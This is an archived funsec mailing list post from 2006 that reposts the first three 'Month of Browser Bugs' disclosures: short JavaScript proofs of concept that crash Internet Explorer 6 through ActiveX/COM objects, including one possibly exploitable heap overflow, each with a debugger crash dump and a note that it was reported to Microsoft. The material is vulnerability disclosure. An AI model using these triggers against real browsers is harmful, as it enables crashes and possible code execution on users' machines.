funsec mailing list archives
Re: H D Moore opened Browser Fun Blog
From: "Dude VanWinkle" <dudevanwinkle () gmail com>
Date: Mon, 3 Jul 2006 16:04:14 -0400
Here are the first three FYI: MoBB #1: ADODB.Recordset Filter Property The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception. a = new ActiveXObject('ADODB.Recordset'); try { a.Filter = "AAAA" } catch(e) { } try { a.Filter = "AAAA" } catch(e) { } try { a.Filter = 0x7ffffffe; } catch(e) { } Demonstration eax=001dbfdc ebx=02820e18 ecx=02821288 edx=028212a8 esi=02821288 edi=00000000 eip=4de194f7 esp=0013ade8 ebp=0013adf0 msado15!CSysString::operator=+0x12: 4de194f7 3907 cmp [edi],eax ds:0023:00000000=???????? This bug was reported to Microsoft on March 6th, 2006. This bug has been added to the OSVDB: Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference. posted by hdm @ 11:27 PM 2 comments links to this post MoBB #2: Internet.HHCtrl Image Property The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set. var a = new ActiveXObject("Internet.HHCtrl.1"); var b = unescape("XXXX"); while (b.length < 256) b += b; for (var i=0; i<4096; i++) { a['Image'] = b + ""; } Demonstration eax=00030288 ebx=00030000 ecx=7ffdd000 edx=00030608 esi=58585850 edi=00000022 eip=7c911f52 esp=0013afcc ebp=0013b1ec ntdll!RtlAllocateHeap+0x31b: 7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=?? This bug was reported to Microsoft on March 6th, 2006. This bug has been added to the OSVDB: Microsoft IE HTML Help COM Object Image Property Heap Overflow. posted by hdm @ 9:11 AM 3 comments links to this post MoBB #3: OutlookExpress.AddressBook The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Window XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer. a = new ActiveXControl('OutlookExpress.AddressBook'); Demonstration eax=00000000 ebx=06622008 ecx=00000002 edx=065814e4 esi=00000000 edi=00000000 eip=0648b2f5 esp=0012a734 ebp=0012a754 msoe!IDwGetOption+0x78: 0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=???????? This bug was reported to Microsoft on March 6th, 2006. This bug has been added to the OSVDB: Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference. _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- H D Moore opened Browser Fun Blog Juha-Matti Laurio (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- <Possible follow-ups>
- Re: Re: H D Moore opened Browser Fun Blog Juha-Matti Laurio (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)